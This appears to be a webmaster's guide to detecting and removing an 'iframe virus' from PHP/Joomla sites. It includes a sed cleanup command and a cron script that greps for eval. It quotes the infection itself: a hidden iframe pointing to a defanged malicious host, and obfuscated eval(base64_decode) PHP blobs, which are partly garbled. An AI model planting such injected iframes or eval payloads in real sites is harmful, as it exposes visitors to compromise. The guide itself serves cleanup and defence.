Removing the Iframe Virus from your Web Pages

What is an Iframe Virus?

An Iframe virus is a malicious piece of code added to a web page which links to a foreign website. The iframe is sized in such a way that the user of the web page does not see the foreign website on his screen. The foreign website often has the ability to compromise the user's computer.

How do you get an Iframe Virus?

Someone must be able to write on to your website in order to infect your code. Typically this happens by someone getting the ftp passwords, user names, and url's of websites you update. This information is often harvested by computer viruses on your local computer. The virus sends the passwords and other information back to another computer which plants the iframe virus.

How will you know you have an Iframe Virus?

Often Google or Microsoft will detect these viruses for you. Blacklists for urls exist and websites may check for for being on a blacklist. Since the iframe often refers to a blacklisted site, the user's browser will not allow access to your site. Instead your users will get a nasty messagesaying that the site they are trying to access has been blacklisted. Often, the signs are more subtle, with behavior on some pages being a little different. A photo may stop appearing or some text may be missing.

You confirm the virus by looking at your web pages. A view source on your computer (not the web server) will show source code that looks like this:

 <iframe height="125" width="125" style="visibility: hidden;"
src="/htxxxtp://a5j.ru:8080/ts/in.cgi?pepsi100"/>

With the htxxxtp not containing all the x's.

Viewing the html code on your computer will reveal something that looks like this:

 <?php  //link to ;// no direct access defined( '_JEXEC' ) or die( 'Restricted in
dex access' );define( 'YOURBASEPATH',<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0
 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!--
 Template version 2.0 for Joomla! 1.5.x -->http://www.w3.org/1999/xhtml" xml:lang
="this->language; ?>" lang="<?php              eval(base64_decode("DQplcnJvcl9yZX
BvcnRpbmcoLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCml
mICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSlD
QpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbWlua29mLnNlbGxjbGFzc2ljcy5jb20vIik7DQpleGl0KC
k7DQp9Cn0KfQ0KfQ0KfQ==")); echo $this->language ?>" dr="<?php                eval
(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0Ka
WYgKCEkcF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLC
JzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzd\
What has happened is that innocent php statements like this:
<?php

Have been hijacked by these long eval statements. The eval statement decodes that long string after the eval and it decodes it to something which is not good for people who come to your site. Typically it creates a small iframe - a window which opens another web page which will further corrupt other peoples computers.

You need to fix this right away.

Scripts that will help you with this:

Removing the virus:

find /public_html -type f -name "*.php" -exec sed -i 
's/<?php\s*eval(base64_decode("DQ[^"]*"));/<?php/g' '{}' \;

There is a lot going on in this one statement. You may have to modify it for your own purposes so I'll try to explain it.

find /public_html -type f -name "*.php" -exec

This part selects the web pages you need to check for viruses. In my case, I was looking for web pages in the /public_html folder, with names ending in "php". This will also check recursively, that is, in folders below the public_html folder.

sed -i 's/<?php\s*eval(base64_decode("DQ[^\"]*"));/<?php/g'

This part does the work.

Sed is is a batch editing program that's part of linux. The "s" in "s/" means substitute. The syntax works like this:  If you had the sentence:

"The boy loves cars"

sed s/loves/hates/ would change it to:

"The boy hates cars".

<?php\s*eval(base64_decode("DQ[^"]*"));

 this is a regular expression. You may have have to change this.

Start with the string "<?php" then any number of blank spaces,

then the string 'eval(base64_decode("DQ' then:

[^"] - means match anything up to a double quote (").

Finally, match thestring "));" which is at the end of the iframe virus.

Replace all this with the string "<?php"

The "g" is part of the syntax of the sed statement, and the '{} \; is part ofhe shell syntax.

You may have to modify the part with the "DQ" string and the match for the double quote at the end. Your iframe virus could have a different phrase. Naturally, you should back up your whole folder before running this.

Afterwards:

You should run this proc periodically. You can put it in your cron file and run it every hour or so. You may have to fool around with the grep statement to make it more or less sensitive to the virus.

# search for index files in pl with eval on first line # echo "this examines the pl directory for the eval virus"
HOUR=$(date +%H)
# echo "time is $HOUR"
EMAILMESSAGE="/tmp/emailmessage.txt"
grep  -nr --include '*.php' eval  /public_html | cut -c1-60 | grep :1: > $EMAILMESSAGE
if [ $? -eq 0 ];  then
echo "found something" >> $EMAILMESSAGE
echo "you have to go to work"
/bin/mail -s "looks like a virus" This email address is being protected from spambots. You need JavaScript enabled to view it.
else
if [ $HOUR -eq 13 ] ; then
echo "nothing to find" >> $EMAILMESSAGE
echo "all is good"
/bin/mail -s "everything looks okay" This email address is being protected from spambots. You need JavaScript enabled to view it. " $EMAILMESSAGE
fi
fi

Go to top